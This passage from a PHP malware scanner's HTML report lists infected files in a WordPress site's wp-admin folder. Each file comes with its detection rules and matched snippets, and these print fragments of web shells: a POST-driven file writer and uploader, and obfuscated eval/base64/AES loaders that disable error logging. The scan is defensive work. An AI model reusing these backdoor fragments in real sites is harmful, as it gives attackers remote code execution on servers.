</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_157").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/theme-inslobk.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 338.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:31:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:31:29</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_158" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">fopen</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'w'</span><span style="color: #007700">), </span><span style="color: #0000BB">$b4</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; fwrite(fopen(trim($_POST['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']), '</span><span style="color: #0000BB">w</span><span style="color: #DD0000">'), $b4(trim($_POST['</span><span style="color: #0000BB">message</span><span style="color: #DD0000">']))); exit; } move_uploaded_file($_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">tmp_name</span><span style="color: #DD0000">'], $_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']); ?></span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_158").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/theme-instyew.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 341.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:51:10</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:51:10</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_159" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">fopen</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'w'</span><span style="color: #007700">), </span><span style="color: #0000BB">$b4</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; fwrite(fopen(trim($_POST['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']), '</span><span style="color: #0000BB">w</span><span style="color: #DD0000">'), $b4(trim($_POST['</span><span style="color: #0000BB">message</span><span style="color: #DD0000">']))); exit; } move_uploaded_file($_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">tmp_name</span><span style="color: #DD0000">'], $_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']); ?></span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_159").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/js/js/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:34</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_160" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'Al6kXXB8nii0Af7g3aJZMrQWJmxLJ69GIM/vrfPUtHc/F7fBG98p/rPXPZ6X9faz7OVCO+vrW8Z589V/gyvo51ZfPbdZa4yx73D3/+tHu3Tvbv1q+jX8yZvdnEv92lPqUBue4da8GJfrxrzO+U6XmIt0WfacW7dxWX/77LTO6j+6GzoVJhyAWxr4wdNTlzIt0f2w5/oXNz63LW5MEB6BljLiltz0pvAj1hBej0LggokiNHPtUX5/kqz2Sb6M10Q6PQmynyF2A6y33uHiQSJuBqwQAZglJtJaGPCtnb3wIsMuvCjD/x+9Fj1hYG1xNkYTJKCTfai7+ht9mF0T6VvdxfdQrGr5TbO9srT87AV2qFqWdFZCKhr3j3G0y1m8FZ0nj8/PGtzvvV72M63br0ZcNhSMKWCqurmcL21rTrodg9V7oJl4tILcMT1zfTV/2/9ajzQ/M6qkcrQB0hE0I7Q1QRluhV8hBzPj4x8eVPgb+ZfNBDrJN8s...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">MCGg</span><span style="color: #007700">(</span><span style="color: #0000BB">$ycXIM</span><span style="color: #007700">) { </span><span style="color: #0000BB">$ZGnQ </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$zGx </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZGnQ</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$Ehv </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$ycXIM</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$Ehv</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$ZGnQ</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$zGx</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">MCGg</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'BloMxtY4RmykUOhFpZkhzg7khkFhkNZuqHD</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$MCGg</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$MCGg</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_160").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/js/js/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 60.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_161" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"bFFjUFhBVUxUakoudGlm"</span><span style="color: #007700">); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_161").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/dOt9XziM76J.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.97 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:12:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:12:34</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_162" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIGqBEpWjyr30jbf/hv5cD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($YoKrR($icyYU('</span><span style="color: #0000BB">VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk</span><span style="color: #007700">+</span><span style="color: #0000BB">YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$YoKrR</span><span style="color: #007700">(</span><span style="color: #0000BB">$icyYU</span><span style="color: #007700">(</span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIG...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_162").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/zN4FynC2lHo.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.97 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:51:10</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:51:10</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_163" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIGqBEpWjyr30jbf/hv5cD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($YoKrR($icyYU('</span><span style="color: #0000BB">VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk</span><span style="color: #007700">+</span><span style="color: #0000BB">YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$YoKrR</span><span style="color: #007700">(</span><span style="color: #0000BB">$icyYU</span><span style="color: #007700">(</span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIG...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_163").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/QNg8ezTrIJY.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.97 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:31:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:31:29</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_164" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIGqBEpWjyr30jbf/hv5cD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($YoKrR($icyYU('</span><span style="color: #0000BB">VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk</span><span style="color: #007700">+</span><span style="color: #0000BB">YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$YoKrR</span><span style="color: #007700">(</span><span style="color: #0000BB">$icyYU</span><span style="color: #007700">(</span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIG...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_164").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/user/user/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:43</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:43</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_165" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'oSO2IIA/WcEB4bH8WDpjbFSKJMeJbnXCnJv84zj3+ydXd4V654Hucaxu3+Ha+yhPNIue5oTO85COPXOUlWR1r1+uschXebmrEM/4Z3d8Nnr/Dne7CX8y5vd3HnN2nPe0Dq2gvXcmKfbxra++UzPmJlI2cT0m6X9WX837Le/6gz+mzuxJi1QnSvUweBfUzM5Ee78p9s/NK0zrW/gUCzRlKB9aVesC2t9CAMPJ4LkYVUFmCs46p97M3XVVuXaS7JnHK/AzYOVg82YlsNuwRImRq7gAYoRJ8IZLhDxnUa8yWGhnj9VfY4eyz/YsCUzuS+gSD1oLE9xLqbH1y7WSHZX82H/2Dda8m/s74DuW1v9WZrWrSldmJYFs+weofrXZ23kQf+y974sPvczXP9yv3Gpz8KClYUsFUNXN9WsqXnWQ/Q7oyJTLxLRX4IWrj/mq+N86vkzQ/E6qkcrQB0hFwA7Q1QRmuhV8RAzPj4x8eVPgb+5fNBDrJN8...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
